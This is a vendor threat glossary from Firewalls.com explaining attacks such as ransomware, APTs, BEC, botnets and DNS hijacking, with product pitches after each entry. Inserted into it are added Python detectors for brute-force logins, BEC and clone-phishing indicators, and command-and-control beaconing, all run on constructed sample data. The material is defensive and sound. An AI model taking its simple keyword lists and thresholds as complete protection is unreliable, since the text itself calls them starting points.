Firewalls.com’s Comprehensive Cyber Threat Dictionary
Cyber threats lurk around every corner in today’s online world, and more sophisticated attacks are created each day to bypass your defenses. The first step in stopping these threats is understanding what they are, how they work, and what vulnerabilities they’re targeting. That’s why Firewalls.com compiled the Threat Dictionary, an A to Z guide to the dangers your organization faces every day. The next step after understanding the threats? Strong network protection.
Adaptive Ransomware Attack
What is an Adaptive Ransomware Attack?
An Adaptive Ransomware Attack (ARA) refers to a ransomware attack that combines advanced automation and real-time human response. Hackers adapt their tools and techniques on the fly to get around defense mechanisms and infect your network with ransomware.
How to Recognize This Threat: A computer with ransomware will receive a message that a type of ransom is required to access files that were previously accessible. The files will be locked with the threat of destruction/deletion if the user does not pay a specified ransom. Theoretically, once the ransom is paid according to instructions, the hackers will provide unlock instructions and the files can be accessed once again. Adaptive ransomware attacks will manifest in the same way as other ransomware attacks, but attack visualization is needed to identify whether the ARA variation occurred.
How to Prevent This Threat: Strong End User Protection with advanced detection and remediation capabilities is key to both recognizing and stopping adaptive ransomware attacks. Combine this protection with attack visualization to ensure you understand the severity of the attack, where it came from, and how many of your data and processes were affected. Check out end user protection options from Sophos and SonicWall.
Advanced Persistent Threat
What is an Advanced Persistent Threat?
An Advanced Persistent Threat (APT) is a targeted attack which entails a dedicated threat actor specifically choosing a network (or networks) to go after. In an Advanced Persistent Threat, attackers are actively managing the direction, method, and intensity of a cyber attack once they initially infiltrate a network, as opposed to many other cyber attack types which are largely automated. These types of pre-planned attacks usually seek specific information about their victims via cyber reconnaissance. These attack types are also unique in that attackers may remain on the network for a longer period of time while they hunt for information they deem valuable and for more advanced network privileges.
How to Recognize This Threat: Unlike many cyber attacks, Advanced Persistent Threats are neither opportunistic nor indiscriminate. Your network may be a victim of an APT attack if executives are targeted as part of a whaling email campaign, if there are unusual logons noted after hours, and if data is moving in unusual methods or volume.
How to Prevent This Threat: Training employees to avoid downloading suspicious attachments or clicking suspicious links in emails can help close a key point of entry for APT hackers. Another tip: keeping all of your software up to date with the latest patches. But the overarching solution to protecting your network is a layered security approach, starting with a firewall complete with active security services. Pick from the top brands to get one shipped to you today.
What is Adware?
Adware is any software application that displays advertising banners, pop-ups, or other unwanted advertising content on your computer. It is intrusive software that can insert advertising graphics directly on a device, collect marketing data, or redirect online users to advertising websites without consent. While not all Adware is malicious, it is generally not only annoying but can also greatly impact the performance of devices and networks. In worst case scenarios, faulty programming of Adware can cause security vulnerabilities for victim networks. Adware is often intentionally designed to be difficult to remove from a system. Common forms of Adware include Browser Hijackers and bulky toolbars.
How to Recognize This Threat: It is not hard to recognize adware on your system in most cases, as you’ll likely notice the presence of unwanted ads either upon startup or while browsing in addition to speed issues. It generally comes as an unwanted download attached to software accessed on a questionable website or can come through an email attachment.
How to Prevent This Threat: Avoid questionable downloads and attachments. And equip your network with robust endpoint security that can ID, block, and remove unwanted adware from your systems.
What is an Anonymizing Proxy?
Anonymizing Proxies are servers that function as an anonymous relay between a user and a destination website to obfuscate web browsing activity. Some proxies also provide a primitive layer of encryption on the user side. Anonymizers are used for a multitude of reasons, both good and bad. Some anonymizers help to minimize risk for web surfers by preventing identity theft or covering up browsing history, which can also stop targeted digital marketing. In more malicious cases, anonymizing proxies are used to bypass legitimate security barriers that are meant to reduce network attack surfaces, such as content filters that block access to certain sites from work computers. Organizations can be liable when users access illegal sites using official devices. Other risks include not knowing who is operating and running anonymizing proxy servers. Some proxies may be used for gathering sensitive user data, recording browsing habits, or distributing malware.
How to Recognize This Threat: The idea of anonymizing proxies is to avoid detection and oversight, but a network with strong security monitoring both automated and by IT staff can typically recognize their usage.
How to Prevent This Threat: With a properly configured firewall plus active security services, you can stop users from circumventing your filters. Get a firewall Free with a 3-year security subscription and get it configured by our experts to ensure your security is optimized.
What is Atom Bombing?
Atom Bombing is a form of cyber attack that abuses Windows’ Atom Tables to inject and execute malicious code. While code injection is a well-known technique, Atom Bombing provides the potential for an attacker to create a breach and set up a persistent presence in a network. Atom tables are used by Windows applications to store integers and data strings that are shared between programs. This type of attack demonstrates how threat actors take advantage of operating systems by using legitimate pieces of those systems maliciously.
How to Recognize This Threat: As atom bombing hides malicious code in a legitimate part of the operating system, it is difficult to specifically detect, but antivirus and antimalware software is always updating to recognize the latest threats.
How to Prevent This Threat: This attack does not target an actual vulnerability, so there is no Windows patch; however, it is always a good idea to keep your operating system updated in case a fix is added. To guard against attacks, ensure all your systems have robust endpoint security.
What is an Auto-Run Worm?
Auto-Run Worms are one of the top reasons to leave strange USB sticks where you find them! Commonly distributed through USB drives, Auto-run Worms are designed as a “surprise attack” that takes advantage of the Windows Auto-Run feature (autorun.inf) to automatically execute malicious code without user consent when an infected device is plugged into a computer. Many forms of this attack also utilize Windows’ Autoplay functions.
How to Recognize This Threat: The threat generally occurs through removable media. If an unverified media object has been inserted and automatically launches, there is a potential for infection.
How to Prevent This Threat: Many modern operating systems disable Auto-Run by default, minimizing the threat of this type of worm. Ensure you have strong endpoint protection just in case as well, so that any infiltration gets squashed immediately.
What is a Backdoor Trojan?
Backdoor Trojans are malicious software programs designed to grant unauthorized access to a remote attacker. Remote attackers can send commands or take full control of a compromised computer. Backdoor malware and viruses bypass authentication procedures to access systems and to prevent their presence from being detected. The designation as a Trojan indicates that this form of attack does not reproduce by spreading to additional files after infection. Once a Trojan gains a foothold in a system, it adds itself to the computer’s startup routine so that rebooting the computer will not permanently end malicious processes.
How to Recognize This Threat: Backdoor Trojans may pose as legitimate software to trick users into running them. They can also spread as attachments or malicious links in spam email.
How to Prevent This Threat: Training users to avoid clicking on suspicious links and avoid downloading email attachments is a good start, but to ensure your network is protected, get a firewall from a top brand along with a security services subscription.
Boot Sector Malware
What is Boot Sector Malware?
Boot Sector Malware applies changes to the startup processes of an infected computer and replaces a device’s original boot sector with its own modified version, automatically overriding and hiding the original version elsewhere on the hard disk. The malware becomes active after startup when the altered boot sector is loaded. Some variants of boot sector malware are designed to load before the operating system, effectively concealing their presence.
How to Recognize This Threat: Boot sector viruses are typically spread via physical media like flash drives and disks, though they may also be sent as email attachments.
How to Prevent This Threat: Strong, continuously updated robust endpoint security will prevent boot sector malware from infecting your users and network.
What is a BotNet?
A BotNet consists of a large collection of infected systems that can be remotely operated by a single threat actor in order to carry out large-scale malicious activity. Botnets can be used to send spam email, launch denial-of-service attacks, or more. Although the owner of the affected device is unaware, a threat actor can make use of the system to do their bidding in future attacks. An infected device is often called a “zombie,” and the greater total collection of zombie computers constitutes a botnet. A botnet can be made up of hundreds or thousands of infected computer systems.
How to Recognize This Threat: A computer or device that is part of a botnet will run especially slow while the user is active, and will also continue activity when the user is not present. The method of infection is typically downloaded malware, often from a suspicious email attachment.
How to Prevent This Threat: To prevent devices on your network from becoming infected as well as decrease the likelihood of a potential botnet attack, protect your organization with a firewall along with a security services subscription. Get a Sophos or SonicWall firewall Free with a 3-year subscription!
What is a Browser Hijacker?
Browser Hijackers make alterations to your default homepage, search engine, or browser without consent. These attacks may lead to semi-permanent changes in your browsing experience, possibly removing the option to reset the homepage or other settings. It is a practice used to artificially inflate a site’s page ranking in search results, which can boost ad revenue.
How to Recognize This Threat: The user will note a difference when surfing the internet, with an unusual homepage displaying upon opening the web browser and other potential problems with the browsing experience. The offending malware often comes through a suspicious email attachment or bundled with another piece of software downloaded from a questionable source.
How to Prevent This Threat: Aside from user vigilance, a robust endpoint security solution will catch the nasty software to prevent it from messing with your web browsing.
Brute Force Attack
What is a Brute Force Attack?
A Brute Force Attack occurs when hackers simply bombard a computer, application, website, or network sign-in with a large number of possible passwords to gain unauthorized access. Hackers can use special programs to try several passwords in a short period to attempt an unauthorized sign-in.
How to Recognize This Threat: Administrators can detect this type of attack by volume. The logs of whatever password-protected log-in is targeted will show an inordinately high volume of login attempts, most of them failures.
How to Prevent This Threat: Logins can be configured to allow only a few attempts before blocking an IP address. Passwords should also be made as complex as possible, making a quick attack impossible. Need help setting up your network sign-ons? Reach out to our Security Operations Center for a solution!
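The detection-by-volume approach described above, as an added example that is not part of the Firewalls.com dictionary: it parses authentication log lines, counts failed logins per source address inside a sliding window, and reports sources that hit a lockout threshold, plus any successful login from a source that had already been flagged, which is the sign that the guessing may have worked. The log format and every line in it are constructed to resemble sshd output; the regular expression is an assumption to adjust for your own service.

```python
"""Detect password brute-force attempts from authentication log lines.

Added example (not Firewalls.com's code). Counts failed logins per source
IP inside a sliding window and reports sources that exceed a threshold.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log lines (not real traffic). ISO-8601 timestamps.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[101]: Failed password for admin from 203.0.113.7 port 51000
2024-05-01T10:00:02 sshd[101]: Failed password for admin from 203.0.113.7 port 51001
2024-05-01T10:00:02 sshd[101]: Failed password for root from 203.0.113.7 port 51002
2024-05-01T10:00:03 sshd[101]: Failed password for admin from 203.0.113.7 port 51003
2024-05-01T10:00:03 sshd[101]: Failed password for bob from 203.0.113.7 port 51004
2024-05-01T10:00:04 sshd[101]: Accepted password for bob from 203.0.113.7 port 51005
2024-05-01T10:00:05 sshd[101]: Failed password for alice from 198.51.100.9 port 40000
2024-05-01T10:05:05 sshd[101]: Failed password for alice from 198.51.100.9 port 40001
2024-05-01T10:10:05 sshd[101]: Accepted password for alice from 198.51.100.9 port 40002
"""

# Assumed line format; change this for the service you actually log.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+$"
)


def parse_line(line):
    """Return a dict for a recognised auth line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "result": m["result"],
            "user": m["user"], "ip": m["ip"]}


def find_brute_force_sources(log_text, max_failures=5, window_seconds=60):
    """Return {ip: (failures, first_ts, last_ts)} for every source that reaches
    max_failures failed logins inside any window_seconds-long window."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    flagged = {}
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None or ev["result"] != "Failed":
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        # Expire failures that fell out of the sliding window.
        while (ev["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= max_failures and ev["ip"] not in flagged:
            flagged[ev["ip"]] = (len(q), q[0], q[-1])
    return flagged


def successes_after_burst(log_text, max_failures=5, window_seconds=60):
    """Accepted logins from a source already flagged for a failure burst,
    returned as (ip, user) pairs: the accounts to investigate first."""
    flagged = find_brute_force_sources(log_text, max_failures, window_seconds)
    hits = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if (ev and ev["result"] == "Accepted" and ev["ip"] in flagged
                and ev["ts"] >= flagged[ev["ip"]][2]):
            hits.append((ev["ip"], ev["user"]))
    return hits


if __name__ == "__main__":
    for ip, (n, first, last) in find_brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} failures between {first} and {last}")
    print("successful logins after a burst:", successes_after_burst(SAMPLE_LOG))
```

With the defaults (five failures within sixty seconds) only 203.0.113.7 is flagged; 198.51.100.9 fails twice five minutes apart, which is ordinary user behaviour. The same window logic is what a lockout rule implements on the login side: once a source is flagged, further attempts from it are refused for a cooling-off period rather than merely logged.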
What is a Buffer Overflow?
A Buffer Overflow takes place when a program writes more data into a fixed-size area of memory (a buffer) than it can hold, overwriting adjacent memory and causing errors or even crashes. Hackers launch buffer overflow attacks by sending more data to a program than it expects (often including malicious code), so that the excess overwrites neighboring memory the application relies on. This can allow unauthorized code to execute or simply lead to a system crash.
How to Recognize This Threat: Buffer overflows can occur in any application, not just core programs or services. An area to pay special attention to is any code dealing with input supplied by an outside source such as a user, as this code provides an easier path for exploitation (especially if there is no bounds checking).
How to Prevent This Threat: This attack almost always occurs at the application level, so keeping all your applications updated with the latest security patches will cover any known vulnerabilities. Buffer overflows can also be executed by viruses, so ensure your network is protected with a firewall from a top brand along with an active security services subscription.
Business Email Compromise (BEC)
What is Business Email Compromise (BEC)?
Business Email Compromise (BEC) – also referred to as a man-in-the-email attack – occurs when a hacker impersonates an executive, sending emails as the executive to trick employees into transferring funds, sending sensitive data, or opening a malicious attachment. These attacks can use compromised internal addresses or addresses that look similar to those within the network.
How to Recognize This Threat: Employees should be suspicious of emails asking for the transfer of funds or data outside of normal operating procedure, as well as any inconsistency in language. In these scams, hackers typically do extensive research into their targets, but they are still likely to miss a key detail or two.
How to Prevent This Threat: Well-trained employees with well-established procedures should know not to jump at these suspicious messages. Robust email security should be in place to protect your network. It can even be configured to flag emails with keywords like “transfer,” “payment,” etc. so that they receive extra attention.
What is Clone Phishing?
Clone phishing refers to a type of phishing email attack that uses an actual email that’s successfully been delivered before to create an identical (or nearly identical) copy. The clone phishing email may contain the same content, attachment, recipient, and sender email address as the genuine article, except a fraudulent link or attachment replaces the original.
How to Recognize This Threat: Because a clone phishing email appears to be from a legitimate source, unsuspecting victims likely won’t have the same suspicions that a sloppier phishing email – which is often filled with typos or a clearly visible phony address – would generate. Regardless though, users should inspect every link and attachment within any email very carefully before clicking.
How to Prevent This Threat: If anything seems fishy (or phishy) after inspecting an email – even if it looks legit – it’s best to train users not to click through. But since humans are involved, your network should incorporate email protection that takes a deeper look at everything coming through your inbox, filtering out spam and other suspicious messages. Learn about Barracuda Email Security for a wide array of options to consider.
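The keyword flagging described under Business Email Compromise and the link-replacement pattern described under Clone Phishing, as one added example that is not part of the Firewalls.com dictionary and not any vendor's email-security logic. It inspects inbound messages (plain dictionaries built inline) for BEC indicators (a look-alike sender domain, an executive's display name on a non-directory address, a mismatched Reply-To, sensitive keywords) and compares a message against previously delivered mail to catch a clone whose links or attachments were swapped. ORG_DOMAIN, EXECUTIVES, BEC_KEYWORDS and the sample messages are assumed values to replace with your own.

```python
"""Flag BEC and clone-phishing indicators in inbound mail.

Added example (not Firewalls.com's or any vendor's code). Policy values
below are assumptions; the messages are constructed samples.
"""
import re

ORG_DOMAIN = "example.com"                         # assumed: your own domain
EXECUTIVES = {"jane ceo": "jane.ceo@example.com"}  # assumed executive directory
BEC_KEYWORDS = ("wire transfer", "payment", "invoice", "urgent", "gift card")
URL_RE = re.compile(r"https?://[^\s<>]+")


def edit_distance(a, b):
    """Levenshtein distance, used to catch look-alike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(addr):
    return addr.rsplit("@", 1)[-1].lower()


def bec_indicators(msg):
    """Return the reasons a message looks like BEC (empty list if none)."""
    reasons = []
    dom = sender_domain(msg["from_addr"])
    if dom != ORG_DOMAIN and edit_distance(dom, ORG_DOMAIN) <= 2:
        reasons.append(f"look-alike sender domain {dom}")
    name = msg["from_name"].strip().lower()
    if name in EXECUTIVES and msg["from_addr"].lower() != EXECUTIVES[name]:
        reasons.append(f"display name '{msg['from_name']}' does not match directory address")
    text = (msg["subject"] + " " + msg["body"]).lower()
    hits = [k for k in BEC_KEYWORDS if k in text]
    if hits:
        reasons.append("sensitive keywords: " + ", ".join(hits))
    if msg.get("reply_to") and sender_domain(msg["reply_to"]) != dom:
        reasons.append("reply-to domain differs from sender domain")
    return reasons


def clone_indicators(msg, delivered):
    """Compare against already-delivered mail: identical subject and text but
    different links or attachments is the clone-phishing pattern."""
    reasons = []
    links = set(URL_RE.findall(msg["body"]))
    for old in delivered:
        same_text = URL_RE.sub("<url>", old["body"]) == URL_RE.sub("<url>", msg["body"])
        if old["subject"] != msg["subject"] or not same_text:
            continue
        old_links = set(URL_RE.findall(old["body"]))
        if links != old_links:
            reasons.append(f"links replaced: {sorted(links - old_links)}")
        if msg.get("attachments", []) != old.get("attachments", []):
            reasons.append("attachments differ from original")
    return reasons


# Constructed sample messages (not real mail).
DELIVERED = [{"from_name": "IT Helpdesk", "from_addr": "helpdesk@example.com",
              "subject": "Password policy update",
              "body": "Please review the new policy at https://intranet.example.com/policy",
              "attachments": []}]

CLONE = {"from_name": "IT Helpdesk", "from_addr": "helpdesk@example.com",
         "subject": "Password policy update",
         "body": "Please review the new policy at https://intranet.examp1e.com/policy",
         "attachments": []}

BEC_MSG = {"from_name": "Jane CEO", "from_addr": "jane.ceo@examp1e.com",
           "reply_to": "jane.ceo@mail-example.net",
           "subject": "Urgent wire transfer",
           "body": "I need a payment sent before noon, keep this confidential."}

if __name__ == "__main__":
    print("BEC:", bec_indicators(BEC_MSG))
    print("clone:", clone_indicators(CLONE, DELIVERED))
```

A real gateway would combine these with authentication results (SPF, DKIM, DMARC) rather than rely on text alone; the point of the example is that each check above corresponds to one of the tells named in the entries: the slightly-off address, the executive name on the wrong mailbox, the money-moving vocabulary, and the familiar email whose only change is the link.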
What is Code Caving?
Code Caving occurs when a hacker hides malware within a legitimate application. The hacker injects malicious code through a “code cave,” filling previously empty or unused space in an application.
How to Recognize This Threat: This appears to the user to be good software as it also fools many traditional security applications into whitelisting it. It takes a robust endpoint solution to detect its presence.
How to Prevent This Threat: Sophos Intercept X endpoint protection is built to detect unauthorized code cave content and stop it from causing any damage to your computer or network. Try it free before buying!
Command & Control Center
What is a Command & Control Center?
A Command & Control Center (aka a C&C or C2) is a computer that controls a botnet. From a C&C, hackers can instruct this network of zombie computers to perform desired activities, such as launching distributed denial-of-service attacks against websites. Some botnets are controlled by a distributed command and control system, which makes them tougher to shut down.
How to Recognize This Threat: Computers on your network that are infected with malware could have a command & control center behind them trying to further communicate. Analyzing traffic, and especially taking note of communication activity coming from an otherwise dormant computer may be a clue.
How to Prevent This Threat: Configuration is key to keeping C&Cs from communicating with your network. The right configuration means strong egress rules and more. Our engineers are masters of firewall configuration, so let them do the heavy lifting for you!
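The traffic-analysis clue mentioned above (regular check-ins from a computer that should be idle) as an added example, not part of the Firewalls.com dictionary and not any product's detection logic. It groups outbound connections by internal source, external destination and port, then flags flows whose inter-connection intervals are almost perfectly regular, the usual shape of a bot polling its controller. The connection records are constructed; the thresholds are assumptions to tune against your own traffic.

```python
"""Spot beacon-like outbound traffic that may be command-and-control.

Added example (not Firewalls.com's or any vendor's code). Records and
thresholds are constructed/assumed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed records: (timestamp, source IP, destination IP, dest port, bytes out)
SAMPLE_CONNECTIONS = [
    # 10.0.0.5 contacts 198.51.100.20 every ~5 minutes at 2 AM with tiny payloads
    ("2024-05-01T02:00:00", "10.0.0.5", "198.51.100.20", 443, 310),
    ("2024-05-01T02:05:01", "10.0.0.5", "198.51.100.20", 443, 305),
    ("2024-05-01T02:10:00", "10.0.0.5", "198.51.100.20", 443, 312),
    ("2024-05-01T02:14:59", "10.0.0.5", "198.51.100.20", 443, 308),
    ("2024-05-01T02:20:00", "10.0.0.5", "198.51.100.20", 443, 311),
    ("2024-05-01T02:25:01", "10.0.0.5", "198.51.100.20", 443, 306),
    # ordinary browsing from 10.0.0.8: irregular timing and sizes
    ("2024-05-01T09:01:10", "10.0.0.8", "203.0.113.50", 443, 14000),
    ("2024-05-01T09:01:12", "10.0.0.8", "203.0.113.50", 443, 2200),
    ("2024-05-01T09:07:45", "10.0.0.8", "203.0.113.50", 443, 51000),
    ("2024-05-01T09:30:02", "10.0.0.8", "203.0.113.50", 443, 900),
    ("2024-05-01T11:12:33", "10.0.0.8", "203.0.113.50", 443, 7600),
    ("2024-05-01T11:12:40", "10.0.0.8", "203.0.113.50", 443, 3100),
]


def find_beacons(records, min_connections=5, max_jitter=0.1):
    """Return {(src, dst, port): summary} for flows whose connection intervals
    have a coefficient of variation (std dev / mean) at or below max_jitter."""
    flows = defaultdict(list)
    for ts, src, dst, port, nbytes in records:
        flows[(src, dst, port)].append((datetime.fromisoformat(ts), nbytes))
    beacons = {}
    for key, events in flows.items():
        if len(events) < min_connections:
            continue                      # too few samples to judge regularity
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        avg = mean(gaps)
        if avg == 0:
            continue
        jitter = pstdev(gaps) / avg       # 0 means perfectly periodic
        if jitter <= max_jitter:
            beacons[key] = {
                "connections": len(events),
                "mean_interval_s": round(avg, 1),
                "jitter": round(jitter, 3),
                "mean_bytes_out": round(mean(b for _, b in events)),
            }
    return beacons


if __name__ == "__main__":
    for (src, dst, port), info in find_beacons(SAMPLE_CONNECTIONS).items():
        print(f"{src} -> {dst}:{port} looks like a beacon: {info}")
```

Real malware often adds random jitter to its check-in interval, so treat the threshold as a starting point and correlate with the other clues the entry names: the hour (no user at the keyboard), the consistently small payload, and a destination nothing else on the network talks to. Strong egress rules then stop the flagged host from reaching the controller at all.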
What is a Cookie?
How to Recognize This Threat: Cookies are automatically collected by websites unless the user opts out of cookies or adjusts web browser privacy settings.
How to Prevent This Threat: Cookies are not a threat in themselves. They can be controlled by regularly deleting them or by setting web browsers not to share them automatically. Prevent cookies being used against your organization with a firewall from a top brand.
What is a Credential Threat?
A Credential Threat involves a hacker attempting to steal the login credentials of a user and then using those credentials to gain access to the user’s accounts, often focusing specifically on the user’s organizational access.
How to Recognize This Threat: Credential threats typically originate via email, with spearphishing and whaling emails designed to steal users’ login information and passwords.
How to Prevent This Threat: Organizations should train users to look for the signs of phishing emails and teach them how to avoid falling victim to them. Most importantly though, organizations should have robust cyber security measures in place, including a firewall with active security services. Get a firewall Free with a 3-year subscription.
What is a CryptoLocker?
CryptoLocker is a trojan horse virus that encrypts virtually any files associated with an infected system, allowing the threat actors who’ve deployed it to hold them for ransom. It, and other malware like it, is also more commonly known as ransomware.
How to Recognize This Threat: Once files are encrypted, the CryptoLocker virus will display a screen with the desired ransom amount to allow victims who’ve paid to receive an encryption key to regain access to files. This and other ransomware types often enter a system through an email attachment in an infected Microsoft Word .doc file or .pdf.
How to Prevent This Threat: Employees should be trained to avoid clicking on any unknown or unverified attachments. Additionally, the latest next generation firewalls with updated security services including machine learning and sandboxing can help find and prevent these threats. Rules limiting network access to only those who need it can prevent more widespread encryption if one computer is infected. And as with any ransomware, regular backups of network files make it possible to restore your data without requiring an encryption key.
What is Cyber Reconnaissance?
Cyber Reconnaissance refers to the practice of covertly gathering data online. This intelligence gathering can be done with both benign and malicious intentions. Bad actors use various methods to gather information about potential attack victims and find exploitable weaknesses. The information gathered can be used to imitate or bribe an individual to gain access to a wider network, or simply to help the attacker understand points of weakness in a network setup. Additionally, it aids in developing phishing email campaigns. On the positive side, threat intelligence experts conduct cyber reconnaissance around the clock to track and prevent cyber threats.
How to Recognize This Threat: The threat is all around, with data about individuals often readily available throughout the online world. How pervasive is it? According to Verizon, cyber reconnaissance is a part of over 90 percent of successful breaches. Bad actors gather information on targets via social media, online searches, comment and message boards, and more.
How to Prevent This Threat: Users should secure their social media accounts with strong privacy settings and take care when posting any information online. Businesses too should practice strong hygiene online to minimize the cyber footprint of employees and the company. Separating business from personal activity and making it difficult for attackers to tie an individual to a specific organization is helpful as well.
What is DarkSide Ransomware?
Powering its way onto the threat landscape in Summer 2020, the DarkSide ransomware operation involves a group of threat actors deploying highly targeted attacks. These attacks have a variety of ransoms attached, depending on the organization’s ability to pay (as studied by the group). DarkSide does not refer to a specific type of ransomware, as the group creates a customized executable file for each target.
How to Recognize This Threat: As with any ransomware, DarkSide is not interested in being secretive once it infects a network. Files will be encrypted and a message will display with the ransom amount required to unlock them. Additionally, victims suffer data exfiltration, with that information posted to a data leak site to further encourage payment.
How to Prevent This Threat: As with most threats, a multi-faceted approach is key. A trained workforce that behaves responsibly online is a good start. But for further protection against DarkSide and other ransomware, a next generation firewall with the latest security services can help find and block these threats. Additionally, regular backups of network files make restoring your business possible without the need for an encryption key.
What is Data Leakage?
Data Leakage occurs when sensitive information is exposed in an unauthorized manner. From another angle, it involves the failure to protect such information, and it can lead to data loss or data theft.
How to Recognize This Threat: The threat of data leakage is especially great when data is shared between multiple management applications within an organization, such as Human Resources, CRM, and Accounting tools.
How to Prevent This Threat: Access Control Lists, encryption, and generally strong internal network security are a must. A cornerstone of network security is a robust firewall, through which all traffic should be managed. See excellent firewall options from a variety of top brands.
What is Data Loss?
Data Loss describes accidentally losing data, rather than having it stolen.
How to Recognize This Threat: Data loss can occur when an employee misplaces a device such as a laptop, phone, or flash drive that contains sensitive information.
How to Prevent This Threat: Protect your organization from lost data falling into the wrong hands with strong data security techniques, preventing unauthorized access to your devices. Learn how our experts can help you with Access Control Lists and other security services.
What is Data Theft?
Data Theft involves deliberately stealing information from an organization (not an accidental loss of data). Data theft can occur both from within (as in an employee) or without (as in a hacker). Hackers typically steal data using malware such as keyloggers or spearphishing emails. Data theft can also be accomplished through stolen hardware, like computers and flash drives.
How to Recognize This Threat: It often takes organizations quite a while to detect a data breach (an average of more than 6 months according to a Ponemon Institute study). To recognize data theft, organizations should monitor network and employee activity, and have data theft detection tools in place.
How to Prevent This Threat: Prevent data theft with robust network security measures. There’s no better starting point than a next-generation firewall. Find the option that’s right for your network size.
What is a Denial-of-Service Attack?
A Denial-of-Service (DoS) Attack is an effort by a hacker to overload or shutdown a service, preventing legitimate users from accessing it. Typically, DoS attacks target web servers, aiming to crash websites by flooding them with more traffic than they can handle. No data is stolen or compromised, but the service interruption can cause financial or reputational damage to an organization. The most common method to carry out an attack is by using a botnet (multiple hacker-controlled computers) to overload the server with requests, in what is called a Distributed Denial-of-Service (DDoS) attack.
How to Recognize This Threat: The obvious symptom of a DoS attack is unavailability of a normally reliable website or service, from online gaming to email. These attacks can also cause major network slowdowns for those affected.
How to Prevent This Threat: Stop a DoS attack by denying hackers access to your network. That means a powerful firewall with active security services as part of a layered security approach.
What is DNS Hijacking?
DNS (Domain Name System) Hijacking (or poisoning) occurs when a hacker changes a computer’s settings to either ignore DNS or use a DNS server controlled by other hackers. DNS is considered the “phone book of the internet.” It allows browsers to translate domain names into IP addresses. By interfering with this system, attackers can redirect communication to fraudulent sites, like fake login pages for banks and credit cards, which they then use to steal login information.
How to Recognize This Threat: DNS hijacking is difficult for the average user to recognize, as it occurs behind the scenes and may not always affect regular web browsing behavior. Signs can exist though, including difficulty navigating the web. Online testers exist to determine if your DNS has been hijacked.
How to Prevent This Threat: A hacker still needs a way in to launch a DNS hijacking attack, so keep all applications up-to-date with the latest patches, and ensure your network has a state-of-the-art firewall with active security services.
What is Document Malware?
Document Malware is a type of malicious code embedded within documents. In other words, hackers take advantage of vulnerabilities in applications that read or allow editing of documents, like Microsoft Office or Adobe Acrobat. Hackers exploit these vulnerabilities by including malware code within documents that infects a computer once these documents are opened.
How to Recognize This Threat: As with any file-based malware, the most likely delivery method is via email, as a malicious attachment that must be opened to cause harm.
How to Prevent This Threat: Train your users to be on the lookout for suspicious attachments, and ensure your network is equipped with strong & up-to-date email security hardware/software.
What is a Drive-By Download?
A Drive-By Download involves a computer becoming infected with malware simply by visiting a malicious website. This means no clicks are required to infect a computer with malware. Drive-by downloads exploit browser (and plug-in) vulnerabilities to deliver malicious software to a computer.
How to Recognize This Threat: Recognizing the threat is difficult, as drive-by downloads are often connected to compromised, legitimate sites that a user may regularly visit. This means users do not need to be tricked into visiting a malicious site to become infected.
How to Prevent This Threat: Avoiding unknown, malicious sites is still recommended to limit possible exposure. Beyond that, browsers should be kept up-to-date, and networks should be equipped with robust endpoint security along with web filtering.
What is Dropper Malware?
A Dropper is a program that injects – or drops – other malicious software such as viruses or worms onto a computer. Droppers may also be a delivery mechanism for a ransomware attack.
How to Recognize This Threat: Droppers can often execute their objective without saving onto a computer’s internal storage, which makes them especially difficult to detect.
How to Prevent This Threat: Access control giving few users administrative privileges can help prevent droppers from causing major network damage. But the best insurance is a firewall plus security services subscription. Bundle these and get FREE hardware from Sophos or SonicWall.
Email Malware Distribution
What is Email Malware Distribution?
Email Malware Distribution refers to a primary method used by hackers to spread malware: sending it via email. Some of the most widespread viruses have proliferated through attachments in email, with the user mistakenly double-clicking to download the malicious software. Email is still used as a method to distribute malware, though the focus has shifted from attachments to embedded links that take the user to a malicious website.
How to Recognize This Threat: Users can recognize email threats by examining their messages closely for signs of anything unusual, whether it be an unknown sender, strange typos, unknown links/attachments, or style/content issues that make an email look less than official.
How to Prevent This Threat: Users should be trained to look for signs of suspicious messages and avoid clicking on attachments/links included within them. Your network should also be equipped with robust email security hardware/software.
What are Encrypted Threats?
Encrypted threats are any threats that use encryption to go undetected. They include attack types like malware, ransomware, spear-phishing, zero-day, data exfiltration, rogue sites, and more. Just as there are many types of encryption, there are many methods attackers use to transmit encrypted threats.
How to Recognize This Threat: One type of encrypted threat is a certificate vulnerability, in which the security certification of a particular website is not up to snuff – usually signified by an alert in your browser. In another, malware embeds all its communications inside an encrypted tunnel, so traditional network security cannot spot it. And yet another involves breaches of encrypted traffic, taking advantage of the encryption to execute man-in-the-middle attacks. Hackers use this attack type to intercept emails or steal credentials, transaction data, and other private information.
How to Prevent This Threat: Protecting against encrypted threats requires the latest technology, starting with a next generation firewall (NGFW). The latest firewalls are a starting point to deploy advanced security services, such as Deep Packet Inspection from SonicWall. This subscription add-on offers visibility into encrypted traffic, blocks encrypted malware downloads, and IDs unauthorized transmission of data to external systems.
Evil Twin Attack
What is an Evil Twin Attack?
An evil twin attack involves an attacker setting up a fraudulent wireless access point – also known as an evil twin – that mimics the characteristics (including the SSID) of a legitimate AP. This attack has existed about as long as wifi has. Users may connect automatically to the evil twin or do so thinking the fraudulent AP is part of a trusted wifi network. Attackers can expedite this process by disrupting the connection to the legitimate AP their device is mimicking. Once users have connected to an evil twin, they may be asked to enter a username/password to gain access via a fraudulent form which goes to the attacker. Or the attacker can simply eavesdrop and intercept any unsecured information users transmit – all without their knowledge.
